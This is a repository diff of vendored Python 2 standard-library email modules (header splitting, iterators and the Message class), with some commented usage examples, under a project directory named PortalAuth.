            # There's nothing useful to split the line on, not even spaces, so
            # just append this line unchanged
            lines.append(line)
            maxlen = restlen
            continue
        # Now split the line on the character plus trailing whitespace
        cre = re.compile(r'%s\s*' % ch)
        if ch in ';,':
            eol = ch
        else:
            eol = ''
        joiner = eol + ' '
        joinlen = len(joiner)
        wslen = len(continuation_ws.replace('\t', SPACE8))
        this = []
        linelen = 0
        for part in cre.split(line):
            curlen = linelen + max(0, len(this)-1) * joinlen
            partlen = len(part)
            onfirstline = not lines
            # We don't want to split after the field name, if we're on the
            # first line and the field name is present in the header string.
            if ch == ' ' and onfirstline and \
                   len(this) == 1 and fcre.match(this[0]):
                this.append(part)
                linelen += partlen
            elif curlen + partlen > maxlen:
                if this:
                    lines.append(joiner.join(this) + eol)
                # If this part is longer than maxlen and we aren't already
                # splitting on whitespace, try to recursively split this line
                # on whitespace.
                if partlen > maxlen and ch != ' ':
                    subl = _split_ascii(part, maxlen, restlen,
                                        continuation_ws, ' ')
                    lines.extend(subl[:-1])
                    this = [subl[-1]]
                else:
                    this = [part]
                linelen = wslen + len(this[-1])
                maxlen = restlen
            else:
                this.append(part)
                linelen += partlen
        # Put any left over parts on a line by themselves
        if this:
            lines.append(joiner.join(this))
    return lines

def _binsplit(splittable, charset, maxlinelen):
    i = 0
    j = len(splittable)
    while i < j:
        # Invariants:
        # 1. splittable[:k] fits for all k <= i (note that we *assume*,
        #    at the start, that splittable[:0] fits).
        # 2. splittable[:k] does not fit for any k > j (at the start,
        #    this means we shouldn't look at any k > len(splittable)).
        # 3. We don't know about splittable[:k] for k in i+1..j.
        # 4. We want to set i to the largest k that fits, with i <= k <= j.
        #
        m = (i+j+1) >> 1  # ceiling((i+j)/2); i < m <= j
        chunk = charset.from_splittable(splittable[:m], True)
        chunklen = charset.encoded_header_len(chunk)
        if chunklen <= maxlinelen:
            # m is acceptable, so is a new lower bound.
            i = m
        else:
            # m is not acceptable, so final i must be < m.
            j = m - 1
    # i == j.  Invariant #1 implies that splittable[:i] fits, and
    # invariant #2 implies that splittable[:i+1] does not fit, so i
    # is what we're looking for.
    first = charset.from_splittable(splittable[:i], False)
    last = charset.from_splittable(splittable[i:], False)
    return first, last
73
PortalAuth/includes/scripts/libs/email/iterators.py
Executable file
@@ -0,0 +1,73 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Various types of useful iterators and generators."""

__all__ = [
    'body_line_iterator',
    'typed_subpart_iterator',
    'walk',
    # Do not include _structure() since it's part of the debugging API.
    ]

import sys
from cStringIO import StringIO

# This function will become a method of the Message class
def walk(self):
    """Walk over the message tree, yielding each subpart.

    The walk is performed in depth-first order.  This method is a
    generator.
    """
    yield self
    if self.is_multipart():
        for subpart in self.get_payload():
            for subsubpart in subpart.walk():
                yield subsubpart

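# --- Illustrative sketch (editorial addition, not part of the upstream
# module): walk() yields the message itself first, then each subpart
# depth-first.
#
#   [part.get_content_type() for part in msg.walk()]
#   # e.g. ['multipart/mixed', 'text/plain', 'image/png']
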
# These two functions are imported into the Iterators.py interface module.
def body_line_iterator(msg, decode=False):
    """Iterate over the parts, returning string payloads line-by-line.

    Optional decode (default False) is passed through to .get_payload().
    """
    for subpart in msg.walk():
        payload = subpart.get_payload(decode=decode)
        if isinstance(payload, basestring):
            for line in StringIO(payload):
                yield line

def typed_subpart_iterator(msg, maintype='text', subtype=None):
    """Iterate over the subparts with a given MIME type.

    Use `maintype' as the main MIME type to match against; this defaults to
    "text".  Optional `subtype' is the MIME subtype to match against; if
    omitted, only the main type is matched.
    """
    for subpart in msg.walk():
        if subpart.get_content_maintype() == maintype:
            if subtype is None or subpart.get_content_subtype() == subtype:
                yield subpart

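# --- Illustrative sketch (editorial addition, not part of the upstream
# module): collecting just the text/plain bodies of a multipart message.
#
#   for part in typed_subpart_iterator(msg, 'text', 'plain'):
#       print part.get_payload(decode=True)
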
def _structure(msg, fp=None, level=0, include_default=False):
    """A handy debugging aid"""
    if fp is None:
        fp = sys.stdout
    tab = ' ' * (level * 4)
    print >> fp, tab + msg.get_content_type(),
    if include_default:
        print >> fp, '[%s]' % msg.get_default_type()
    else:
        print >> fp
    if msg.is_multipart():
        for subpart in msg.get_payload():
            _structure(subpart, fp, level+1, include_default)
BIN
PortalAuth/includes/scripts/libs/email/iterators.pyc
Executable file
Binary file not shown.
797
PortalAuth/includes/scripts/libs/email/message.py
Executable file
@@ -0,0 +1,797 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Basic message object for the email package object model."""

__all__ = ['Message']

import re
import uu
import binascii
import warnings
from cStringIO import StringIO

# Intrapackage imports
import email.charset
from email import utils
from email import errors

SEMISPACE = '; '

# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')

# Helper functions
def _splitparam(param):
    # Split header parameters.  BAW: this may be too simple.  It isn't
    # strictly RFC 2045 (section 5.1) compliant, but it catches most headers
    # found in the wild.  We may eventually need a full fledged parser.
    a, sep, b = param.partition(';')
    if not sep:
        return a.strip(), None
    return a.strip(), b.strip()

def _formatparam(param, value=None, quote=True):
    """Convenience function to format and return a key=value pair.

    This will quote the value if needed or if quote is true.  If value is a
    three tuple (charset, language, value), it will be encoded according
    to RFC2231 rules.
    """
    if value is not None and len(value) > 0:
        # A tuple is used for RFC 2231 encoded parameter values where items
        # are (charset, language, value).  charset is a string, not a Charset
        # instance.
        if isinstance(value, tuple):
            # Encode as per RFC 2231
            param += '*'
            value = utils.encode_rfc2231(value[2], value[0], value[1])
        # BAW: Please check this.  I think that if quote is set it should
        # force quoting even if not necessary.
        if quote or tspecials.search(value):
            return '%s="%s"' % (param, utils.quote(value))
        else:
            return '%s=%s' % (param, value)
    else:
        return param

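# --- Illustrative sketch (editorial addition, not part of the upstream
# module): _formatparam() quotes values by default and RFC 2231-encodes
# tuple values.
#
#   _formatparam('charset', 'us-ascii')
#   # -> 'charset="us-ascii"'  (quote defaults to True)
#   _formatparam('filename', ('utf-8', '', 'r\xc3\xa9sum\xc3\xa9.txt'),
#                quote=False)
#   # -> "filename*=utf-8''r%C3%A9sum%C3%A9.txt"
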
def _parseparam(s):
    plist = []
    while s[:1] == ';':
        s = s[1:]
        end = s.find(';')
        while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
            end = s.find(';', end + 1)
        if end < 0:
            end = len(s)
        f = s[:end]
        if '=' in f:
            i = f.index('=')
            f = f[:i].strip().lower() + '=' + f[i+1:].strip()
        plist.append(f.strip())
        s = s[end:]
    return plist

def _unquotevalue(value):
    # This is different than utils.collapse_rfc2231_value() because it doesn't
    # try to convert the value to a unicode.  Message.get_param() and
    # Message.get_params() are both currently defined to return the tuple in
    # the face of RFC 2231 parameters.
    if isinstance(value, tuple):
        return value[0], value[1], utils.unquote(value[2])
    else:
        return utils.unquote(value)

class Message:
    """Basic message object.

    A message object is defined as something that has a bunch of RFC 2822
    headers and a payload.  It may optionally have an envelope header
    (a.k.a. Unix-From or From_ header).  If the message is a container (i.e. a
    multipart or a message/rfc822), then the payload is a list of Message
    objects, otherwise it is a string.

    Message objects implement part of the `mapping' interface, which assumes
    there is exactly one occurrence of the header per message.  Some headers
    do in fact appear multiple times (e.g. Received) and for those headers,
    you must use the explicit API to set or get all the headers.  Not all of
    the mapping methods are implemented.
    """
    def __init__(self):
        self._headers = []
        self._unixfrom = None
        self._payload = None
        self._charset = None
        # Defaults for multipart messages
        self.preamble = self.epilogue = None
        self.defects = []
        # Default content type
        self._default_type = 'text/plain'

    def __str__(self):
        """Return the entire formatted message as a string.
        This includes the headers, body, and envelope header.
        """
        return self.as_string(unixfrom=True)

    def as_string(self, unixfrom=False):
        """Return the entire formatted message as a string.
        Optional `unixfrom' when True, means include the Unix From_ envelope
        header.

        This is a convenience method and may not generate the message exactly
        as you intend because by default it mangles lines that begin with
        "From ".  For more flexibility, use the flatten() method of a
        Generator instance.
        """
        from email.generator import Generator
        fp = StringIO()
        g = Generator(fp)
        g.flatten(self, unixfrom=unixfrom)
        return fp.getvalue()

    def is_multipart(self):
        """Return True if the message consists of multiple parts."""
        return isinstance(self._payload, list)

    #
    # Unix From_ line
    #
    def set_unixfrom(self, unixfrom):
        self._unixfrom = unixfrom

    def get_unixfrom(self):
        return self._unixfrom

    #
    # Payload manipulation.
    #
    def attach(self, payload):
        """Add the given payload to the current payload.

        The current payload will always be a list of objects after this method
        is called.  If you want to set the payload to a scalar object, use
        set_payload() instead.
        """
        if self._payload is None:
            self._payload = [payload]
        else:
            self._payload.append(payload)

    def get_payload(self, i=None, decode=False):
        """Return a reference to the payload.

        The payload will either be a list object or a string.  If you mutate
        the list object, you modify the message's payload in place.  Optional
        i returns that index into the payload.

        Optional decode is a flag indicating whether the payload should be
        decoded or not, according to the Content-Transfer-Encoding header
        (default is False).

        When True and the message is not a multipart, the payload will be
        decoded if this header's value is `quoted-printable' or `base64'.  If
        some other encoding is used, or the header is missing, or if the
        payload has bogus data (i.e. bogus base64 or uuencoded data), the
        payload is returned as-is.

        If the message is a multipart and the decode flag is True, then None
        is returned.
        """
        if i is None:
            payload = self._payload
        elif not isinstance(self._payload, list):
            raise TypeError('Expected list, got %s' % type(self._payload))
        else:
            payload = self._payload[i]
        if decode:
            if self.is_multipart():
                return None
            cte = self.get('content-transfer-encoding', '').lower()
            if cte == 'quoted-printable':
                return utils._qdecode(payload)
            elif cte == 'base64':
                try:
                    return utils._bdecode(payload)
                except binascii.Error:
                    # Incorrect padding
                    return payload
            elif cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
                sfp = StringIO()
                try:
                    uu.decode(StringIO(payload+'\n'), sfp, quiet=True)
                    payload = sfp.getvalue()
                except uu.Error:
                    # Some decoding problem
                    return payload
        # Everything else, including encodings with 8bit or 7bit are returned
        # unchanged.
        return payload
def set_payload(self, payload, charset=None):
|
||||
"""Set the payload to the given value.
|
||||
|
||||
Optional charset sets the message's default character set. See
|
||||
set_charset() for details.
|
||||
"""
|
||||
self._payload = payload
|
||||
if charset is not None:
|
||||
self.set_charset(charset)
|
||||
|
||||
def set_charset(self, charset):
|
||||
"""Set the charset of the payload to a given character set.
|
||||
|
||||
charset can be a Charset instance, a string naming a character set, or
|
||||
None. If it is a string it will be converted to a Charset instance.
|
||||
If charset is None, the charset parameter will be removed from the
|
||||
Content-Type field. Anything else will generate a TypeError.
|
||||
|
||||
The message will be assumed to be of type text/* encoded with
|
||||
charset.input_charset. It will be converted to charset.output_charset
|
||||
and encoded properly, if needed, when generating the plain text
|
||||
representation of the message. MIME headers (MIME-Version,
|
||||
Content-Type, Content-Transfer-Encoding) will be added as needed.
|
||||
|
||||
"""
|
||||
if charset is None:
|
||||
self.del_param('charset')
|
||||
self._charset = None
|
||||
return
|
||||
if isinstance(charset, basestring):
|
||||
charset = email.charset.Charset(charset)
|
||||
if not isinstance(charset, email.charset.Charset):
|
||||
raise TypeError(charset)
|
||||
# BAW: should we accept strings that can serve as arguments to the
|
||||
# Charset constructor?
|
||||
self._charset = charset
|
||||
if 'MIME-Version' not in self:
|
||||
self.add_header('MIME-Version', '1.0')
|
||||
if 'Content-Type' not in self:
|
||||
self.add_header('Content-Type', 'text/plain',
|
||||
charset=charset.get_output_charset())
|
||||
else:
|
||||
self.set_param('charset', charset.get_output_charset())
|
||||
if isinstance(self._payload, unicode):
|
||||
self._payload = self._payload.encode(charset.output_charset)
|
||||
if str(charset) != charset.get_output_charset():
|
||||
self._payload = charset.body_encode(self._payload)
|
||||
if 'Content-Transfer-Encoding' not in self:
|
||||
cte = charset.get_body_encoding()
|
||||
try:
|
||||
cte(self)
|
||||
except TypeError:
|
||||
self._payload = charset.body_encode(self._payload)
|
||||
self.add_header('Content-Transfer-Encoding', cte)
|
||||
|
||||
def get_charset(self):
|
||||
"""Return the Charset instance associated with the message's payload.
|
||||
"""
|
||||
return self._charset
|
||||
|
||||
#
|
||||
# MAPPING INTERFACE (partial)
|
||||
#
|
||||
def __len__(self):
|
||||
"""Return the total number of headers, including duplicates."""
|
||||
return len(self._headers)
|
||||
|
||||
def __getitem__(self, name):
|
||||
"""Get a header value.
|
||||
|
||||
Return None if the header is missing instead of raising an exception.
|
||||
|
||||
Note that if the header appeared multiple times, exactly which
|
||||
occurrence gets returned is undefined. Use get_all() to get all
|
||||
the values matching a header field name.
|
||||
"""
|
||||
return self.get(name)
|
||||
|
||||
def __setitem__(self, name, val):
|
||||
"""Set the value of a header.
|
||||
|
||||
Note: this does not overwrite an existing header with the same field
|
||||
name. Use __delitem__() first to delete any existing headers.
|
||||
"""
|
||||
self._headers.append((name, val))
|
||||
|
||||
def __delitem__(self, name):
|
||||
"""Delete all occurrences of a header, if present.
|
||||
|
||||
Does not raise an exception if the header is missing.
|
||||
"""
|
||||
name = name.lower()
|
||||
newheaders = []
|
||||
for k, v in self._headers:
|
||||
if k.lower() != name:
|
||||
newheaders.append((k, v))
|
||||
self._headers = newheaders
|
||||
|
||||
def __contains__(self, name):
|
||||
return name.lower() in [k.lower() for k, v in self._headers]
|
||||
|
||||
def has_key(self, name):
|
||||
"""Return true if the message contains the header."""
|
||||
missing = object()
|
||||
return self.get(name, missing) is not missing
|
||||
|
||||
def keys(self):
|
||||
"""Return a list of all the message's header field names.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, or were added to the message, and may contain duplicates.
|
||||
Any fields deleted and re-inserted are always appended to the header
|
||||
list.
|
||||
"""
|
||||
return [k for k, v in self._headers]
|
||||
|
||||
def values(self):
|
||||
"""Return a list of all the message's header values.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, or were added to the message, and may contain duplicates.
|
||||
Any fields deleted and re-inserted are always appended to the header
|
||||
list.
|
||||
"""
|
||||
return [v for k, v in self._headers]
|
||||
|
||||
def items(self):
|
||||
"""Get all the message's header fields and values.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, or were added to the message, and may contain duplicates.
|
||||
Any fields deleted and re-inserted are always appended to the header
|
||||
list.
|
||||
"""
|
||||
return self._headers[:]
|
||||
|
||||
def get(self, name, failobj=None):
|
||||
"""Get a header value.
|
||||
|
||||
Like __getitem__() but return failobj instead of None when the field
|
||||
is missing.
|
||||
"""
|
||||
name = name.lower()
|
||||
for k, v in self._headers:
|
||||
if k.lower() == name:
|
||||
return v
|
||||
return failobj
|
||||
|
||||
#
|
||||
# Additional useful stuff
|
||||
#
|
||||
|
||||
def get_all(self, name, failobj=None):
|
||||
"""Return a list of all the values for the named field.
|
||||
|
||||
These will be sorted in the order they appeared in the original
|
||||
message, and may contain duplicates. Any fields deleted and
|
||||
re-inserted are always appended to the header list.
|
||||
|
||||
If no such fields exist, failobj is returned (defaults to None).
|
||||
"""
|
||||
values = []
|
||||
name = name.lower()
|
||||
for k, v in self._headers:
|
||||
if k.lower() == name:
|
||||
values.append(v)
|
||||
if not values:
|
||||
return failobj
|
||||
return values
|
||||
|
||||
def add_header(self, _name, _value, **_params):
|
||||
"""Extended header setting.
|
||||
|
||||
name is the header field to add. keyword arguments can be used to set
|
||||
additional parameters for the header field, with underscores converted
|
||||
to dashes. Normally the parameter will be added as key="value" unless
|
||||
value is None, in which case only the key will be added. If a
|
||||
parameter value contains non-ASCII characters it must be specified as a
|
||||
three-tuple of (charset, language, value), in which case it will be
|
||||
encoded according to RFC2231 rules.
|
||||
|
||||
Example:
|
||||
|
||||
msg.add_header('content-disposition', 'attachment', filename='bud.gif')
|
||||
"""
|
||||
parts = []
|
||||
for k, v in _params.items():
|
||||
if v is None:
|
||||
parts.append(k.replace('_', '-'))
|
||||
else:
|
||||
parts.append(_formatparam(k.replace('_', '-'), v))
|
||||
if _value is not None:
|
||||
parts.insert(0, _value)
|
||||
self._headers.append((_name, SEMISPACE.join(parts)))
|
||||
|
||||
def replace_header(self, _name, _value):
|
||||
"""Replace a header.
|
||||
|
||||
Replace the first matching header found in the message, retaining
|
||||
header order and case. If no matching header was found, a KeyError is
|
||||
raised.
|
||||
"""
|
||||
_name = _name.lower()
|
||||
for i, (k, v) in zip(range(len(self._headers)), self._headers):
|
||||
if k.lower() == _name:
|
||||
self._headers[i] = (k, _value)
|
||||
break
|
||||
else:
|
||||
raise KeyError(_name)
|
||||
|
||||
#
|
||||
# Use these three methods instead of the three above.
|
||||
#
|
||||
|
||||
def get_content_type(self):
|
||||
"""Return the message's content type.
|
||||
|
||||
The returned string is coerced to lower case of the form
|
||||
`maintype/subtype'. If there was no Content-Type header in the
|
||||
message, the default type as given by get_default_type() will be
|
||||
returned. Since according to RFC 2045, messages always have a default
|
||||
type this will always return a value.
|
||||
|
||||
RFC 2045 defines a message's default type to be text/plain unless it
|
||||
appears inside a multipart/digest container, in which case it would be
|
||||
message/rfc822.
|
||||
"""
|
||||
missing = object()
|
||||
value = self.get('content-type', missing)
|
||||
if value is missing:
|
||||
# This should have no parameters
|
||||
return self.get_default_type()
|
||||
ctype = _splitparam(value)[0].lower()
|
||||
# RFC 2045, section 5.2 says if its invalid, use text/plain
|
||||
if ctype.count('/') != 1:
|
||||
return 'text/plain'
|
||||
return ctype
|
||||
|
||||
def get_content_maintype(self):
|
||||
"""Return the message's main content type.
|
||||
|
||||
This is the `maintype' part of the string returned by
|
||||
get_content_type().
|
||||
"""
|
||||
ctype = self.get_content_type()
|
||||
return ctype.split('/')[0]
|
||||
|
||||
def get_content_subtype(self):
|
||||
"""Returns the message's sub-content type.
|
||||
|
||||
This is the `subtype' part of the string returned by
|
||||
get_content_type().
|
||||
"""
|
||||
ctype = self.get_content_type()
|
||||
return ctype.split('/')[1]
|
||||
|
||||
def get_default_type(self):
|
||||
"""Return the `default' content type.
|
||||
|
||||
Most messages have a default content type of text/plain, except for
|
||||
messages that are subparts of multipart/digest containers. Such
|
||||
subparts have a default content type of message/rfc822.
|
||||
"""
|
||||
return self._default_type
|
||||
|
||||
def set_default_type(self, ctype):
|
||||
"""Set the `default' content type.
|
||||
|
||||
ctype should be either "text/plain" or "message/rfc822", although this
|
||||
is not enforced. The default content type is not stored in the
|
||||
Content-Type header.
|
||||
"""
|
||||
self._default_type = ctype
|
||||
|
||||
def _get_params_preserve(self, failobj, header):
|
||||
# Like get_params() but preserves the quoting of values. BAW:
|
||||
# should this be part of the public interface?
|
||||
missing = object()
|
||||
value = self.get(header, missing)
|
||||
if value is missing:
|
||||
return failobj
|
||||
params = []
|
||||
for p in _parseparam(';' + value):
|
||||
try:
|
||||
name, val = p.split('=', 1)
|
||||
name = name.strip()
|
||||
val = val.strip()
|
||||
except ValueError:
|
||||
# Must have been a bare attribute
|
||||
name = p.strip()
|
||||
val = ''
|
||||
params.append((name, val))
|
||||
params = utils.decode_params(params)
|
||||
return params
|
||||
|
||||
def get_params(self, failobj=None, header='content-type', unquote=True):
|
||||
"""Return the message's Content-Type parameters, as a list.
|
||||
|
||||
The elements of the returned list are 2-tuples of key/value pairs, as
|
||||
split on the `=' sign. The left hand side of the `=' is the key,
|
||||
while the right hand side is the value. If there is no `=' sign in
|
||||
the parameter the value is the empty string. The value is as
|
||||
described in the get_param() method.
|
||||
|
||||
Optional failobj is the object to return if there is no Content-Type
|
||||
header. Optional header is the header to search instead of
|
||||
Content-Type. If unquote is True, the value is unquoted.
|
||||
"""
|
||||
missing = object()
|
||||
params = self._get_params_preserve(missing, header)
|
||||
if params is missing:
|
||||
return failobj
|
||||
if unquote:
|
||||
return [(k, _unquotevalue(v)) for k, v in params]
|
||||
else:
|
||||
return params
|
||||
|
||||
def get_param(self, param, failobj=None, header='content-type',
|
||||
unquote=True):
|
||||
"""Return the parameter value if found in the Content-Type header.
|
||||
|
||||
Optional failobj is the object to return if there is no Content-Type
|
||||
header, or the Content-Type header has no such parameter. Optional
|
||||
header is the header to search instead of Content-Type.
|
||||
|
||||
Parameter keys are always compared case insensitively. The return
|
||||
value can either be a string, or a 3-tuple if the parameter was RFC
|
||||
2231 encoded. When it's a 3-tuple, the elements of the value are of
|
||||
the form (CHARSET, LANGUAGE, VALUE). Note that both CHARSET and
|
||||
LANGUAGE can be None, in which case you should consider VALUE to be
|
||||
encoded in the us-ascii charset. You can usually ignore LANGUAGE.
|
||||
|
||||
Your application should be prepared to deal with 3-tuple return
|
||||
values, and can convert the parameter to a Unicode string like so:
|
||||
|
||||
param = msg.get_param('foo')
|
||||
if isinstance(param, tuple):
|
||||
param = unicode(param[2], param[0] or 'us-ascii')
|
||||
|
||||
In any case, the parameter value (either the returned string, or the
|
||||
VALUE item in the 3-tuple) is always unquoted, unless unquote is set
|
||||
to False.
|
||||
"""
|
||||
if header not in self:
|
||||
return failobj
|
||||
for k, v in self._get_params_preserve(failobj, header):
|
||||
if k.lower() == param.lower():
|
||||
if unquote:
|
||||
return _unquotevalue(v)
|
||||
else:
|
||||
return v
|
||||
return failobj
|
||||
|
||||
def set_param(self, param, value, header='Content-Type', requote=True,
|
||||
charset=None, language=''):
|
||||
"""Set a parameter in the Content-Type header.
|
||||
|
||||
If the parameter already exists in the header, its value will be
|
||||
replaced with the new value.
|
||||
|
||||
If header is Content-Type and has not yet been defined for this
|
||||
message, it will be set to "text/plain" and the new parameter and
|
||||
value will be appended as per RFC 2045.
|
||||
|
||||
An alternate header can specified in the header argument, and all
|
||||
parameters will be quoted as necessary unless requote is False.
|
||||
|
||||
If charset is specified, the parameter will be encoded according to RFC
|
||||
2231. Optional language specifies the RFC 2231 language, defaulting
|
||||
to the empty string. Both charset and language should be strings.
|
||||
"""
|
||||
if not isinstance(value, tuple) and charset:
|
||||
value = (charset, language, value)
|
||||
|
||||
if header not in self and header.lower() == 'content-type':
|
||||
ctype = 'text/plain'
|
||||
else:
|
||||
ctype = self.get(header)
|
||||
if not self.get_param(param, header=header):
|
||||
if not ctype:
|
||||
ctype = _formatparam(param, value, requote)
|
||||
else:
|
||||
ctype = SEMISPACE.join(
|
||||
[ctype, _formatparam(param, value, requote)])
|
||||
else:
|
||||
ctype = ''
|
||||
for old_param, old_value in self.get_params(header=header,
|
||||
unquote=requote):
|
||||
append_param = ''
|
||||
if old_param.lower() == param.lower():
|
||||
append_param = _formatparam(param, value, requote)
|
||||
else:
|
||||
append_param = _formatparam(old_param, old_value, requote)
|
||||
if not ctype:
|
||||
ctype = append_param
|
||||
else:
|
||||
ctype = SEMISPACE.join([ctype, append_param])
|
||||
if ctype != self.get(header):
|
||||
del self[header]
|
||||
self[header] = ctype
|
||||
|
||||
def del_param(self, param, header='content-type', requote=True):
|
||||
"""Remove the given parameter completely from the Content-Type header.
|
||||
|
||||
The header will be re-written in place without the parameter or its
|
||||
value. All values will be quoted as necessary unless requote is
|
||||
False. Optional header specifies an alternative to the Content-Type
|
||||
header.
|
||||
"""
|
||||
if header not in self:
|
||||
return
|
||||
new_ctype = ''
|
||||
for p, v in self.get_params(header=header, unquote=requote):
|
||||
if p.lower() != param.lower():
|
||||
if not new_ctype:
|
||||
new_ctype = _formatparam(p, v, requote)
|
||||
else:
|
||||
new_ctype = SEMISPACE.join([new_ctype,
|
||||
_formatparam(p, v, requote)])
|
||||
if new_ctype != self.get(header):
|
||||
del self[header]
|
||||
self[header] = new_ctype
|
||||
|
||||
def set_type(self, type, header='Content-Type', requote=True):
|
||||
"""Set the main type and subtype for the Content-Type header.
|
||||
|
||||
type must be a string in the form "maintype/subtype", otherwise a
|
||||
ValueError is raised.
|
||||
|
||||
This method replaces the Content-Type header, keeping all the
|
||||
parameters in place. If requote is False, this leaves the existing
|
||||
header's quoting as is. Otherwise, the parameters will be quoted (the
|
||||
default).
|
||||
|
||||
An alternative header can be specified in the header argument. When
|
||||
the Content-Type header is set, we'll always also add a MIME-Version
|
||||
header.
|
||||
"""
|
||||
# BAW: should we be strict?
|
||||
if not type.count('/') == 1:
|
||||
raise ValueError
|
||||
# Set the Content-Type, you get a MIME-Version
|
||||
if header.lower() == 'content-type':
|
||||
del self['mime-version']
|
||||
self['MIME-Version'] = '1.0'
|
||||
if header not in self:
|
||||
self[header] = type
|
||||
return
|
||||
params = self.get_params(header=header, unquote=requote)
|
||||
del self[header]
|
||||
self[header] = type
|
||||
# Skip the first param; it's the old type.
|
||||
for p, v in params[1:]:
|
||||
self.set_param(p, v, header, requote)
|
||||
|
||||
def get_filename(self, failobj=None):
|
||||
"""Return the filename associated with the payload if present.
|
||||
|
||||
The filename is extracted from the Content-Disposition header's
|
||||
`filename' parameter, and it is unquoted. If that header is missing
|
||||
the `filename' parameter, this method falls back to looking for the
|
||||
`name' parameter.
|
||||
"""
|
||||
missing = object()
|
||||
filename = self.get_param('filename', missing, 'content-disposition')
|
||||
if filename is missing:
|
||||
filename = self.get_param('name', missing, 'content-type')
|
||||
if filename is missing:
|
||||
return failobj
|
||||
return utils.collapse_rfc2231_value(filename).strip()
|
||||
|
||||
def get_boundary(self, failobj=None):
|
||||
"""Return the boundary associated with the payload if present.
|
||||
|
||||
The boundary is extracted from the Content-Type header's `boundary'
|
||||
parameter, and it is unquoted.
|
||||
"""
|
||||
missing = object()
|
||||
boundary = self.get_param('boundary', missing)
|
||||
if boundary is missing:
|
||||
return failobj
|
||||
# RFC 2046 says that boundaries may begin but not end in w/s
|
||||
return utils.collapse_rfc2231_value(boundary).rstrip()
|
||||
|
||||
def set_boundary(self, boundary):
|
||||
"""Set the boundary parameter in Content-Type to 'boundary'.
|
||||
|
||||
This is subtly different than deleting the Content-Type header and
|
||||
adding a new one with a new boundary parameter via add_header(). The
|
||||
main difference is that using the set_boundary() method preserves the
|
||||
order of the Content-Type header in the original message.
|
||||
|
||||
HeaderParseError is raised if the message has no Content-Type header.
|
||||
"""
|
||||
missing = object()
|
||||
params = self._get_params_preserve(missing, 'content-type')
|
||||
if params is missing:
|
||||
# There was no Content-Type header, and we don't know what type
|
||||
# to set it to, so raise an exception.
|
||||
raise errors.HeaderParseError('No Content-Type header found')
|
||||
newparams = []
|
||||
foundp = False
|
||||
for pk, pv in params:
|
||||
if pk.lower() == 'boundary':
|
||||
newparams.append(('boundary', '"%s"' % boundary))
|
||||
foundp = True
|
||||
else:
|
||||
newparams.append((pk, pv))
|
||||
if not foundp:
|
||||
# The original Content-Type header had no boundary attribute.
|
||||
# Tack one on the end. BAW: should we raise an exception
|
||||
# instead???
|
||||
newparams.append(('boundary', '"%s"' % boundary))
|
||||
# Replace the existing Content-Type header with the new value
|
||||
newheaders = []
|
||||
for h, v in self._headers:
|
||||
if h.lower() == 'content-type':
|
||||
parts = []
|
||||
for k, v in newparams:
|
||||
if v == '':
|
||||
parts.append(k)
|
||||
else:
|
||||
parts.append('%s=%s' % (k, v))
|
||||
newheaders.append((h, SEMISPACE.join(parts)))
|
||||
|
||||
else:
|
||||
newheaders.append((h, v))
|
||||
self._headers = newheaders
|
||||
|
||||
def get_content_charset(self, failobj=None):
|
||||
"""Return the charset parameter of the Content-Type header.
|
||||
|
||||
The returned string is always coerced to lower case. If there is no
|
||||
Content-Type header, or if that header has no charset parameter,
|
||||
failobj is returned.
|
||||
"""
|
||||
missing = object()
|
||||
charset = self.get_param('charset', missing)
|
||||
if charset is missing:
|
||||
return failobj
|
||||
if isinstance(charset, tuple):
|
||||
# RFC 2231 encoded, so decode it, and it better end up as ascii.
|
||||
pcharset = charset[0] or 'us-ascii'
|
||||
try:
|
||||
# LookupError will be raised if the charset isn't known to
|
||||
# Python. UnicodeError will be raised if the encoded text
|
||||
# contains a character not in the charset.
|
||||
charset = unicode(charset[2], pcharset).encode('us-ascii')
|
||||
except (LookupError, UnicodeError):
|
||||
charset = charset[2]
|
||||
# charset character must be in us-ascii range
|
||||
try:
|
||||
if isinstance(charset, str):
|
||||
charset = unicode(charset, 'us-ascii')
|
||||
charset = charset.encode('us-ascii')
|
||||
except UnicodeError:
|
||||
return failobj
|
||||
# RFC 2046, $4.1.2 says charsets are not case sensitive
|
||||
return charset.lower()
|
||||
|
||||
def get_charsets(self, failobj=None):
|
||||
"""Return a list containing the charset(s) used in this message.
|
||||
|
||||
The returned list of items describes the Content-Type headers'
|
||||
charset parameter for this message and all the subparts in its
|
||||
payload.
|
||||
|
||||
Each item will either be a string (the value of the charset parameter
|
||||
in the Content-Type header of that part) or the value of the
|
||||
'failobj' parameter (defaults to None), if the part does not have a
|
||||
main MIME type of "text", or the charset is not defined.
|
||||
|
||||
The list will contain one string for each part of the message, plus
|
||||
one for the container message (i.e. self), so that a non-multipart
|
||||
message will still return a list of length 1.
|
||||
"""
|
||||
return [part.get_content_charset(failobj) for part in self.walk()]
|
||||
|
||||
# I.e. def walk(self): ...
|
||||
from email.iterators import walk
|
||||
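PortalAuth only vendors this module, but the Message API above is easiest to see end to end in a short sketch. The following is illustrative and not part of the vendored source; it uses only methods defined above, in Python 2, and 'capture.bin' is a placeholder filename:

from email.message import Message

msg = Message()
msg['Subject'] = 'Portal test'            # __setitem__ appends; it never overwrites
msg.add_header('Content-Disposition', 'attachment', filename='capture.bin')
msg.set_payload('aGVsbG8=')               # base64 for 'hello'
msg['Content-Transfer-Encoding'] = 'base64'

print msg.get_payload()                   # 'aGVsbG8=' -- raw, undecoded
print msg.get_payload(decode=True)        # 'hello'    -- decoded per the CTE header
print msg.get('CONTENT-DISPOSITION')      # header lookup is case-insensitive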
BIN
PortalAuth/includes/scripts/libs/email/message.pyc
Executable file
Binary file not shown.
0
PortalAuth/includes/scripts/libs/email/mime/__init__.py
Executable file
BIN
PortalAuth/includes/scripts/libs/email/mime/__init__.pyc
Executable file
Binary file not shown.
36
PortalAuth/includes/scripts/libs/email/mime/application.py
Executable file
@@ -0,0 +1,36 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Keith Dart
# Contact: email-sig@python.org

"""Class representing application/* type MIME documents."""
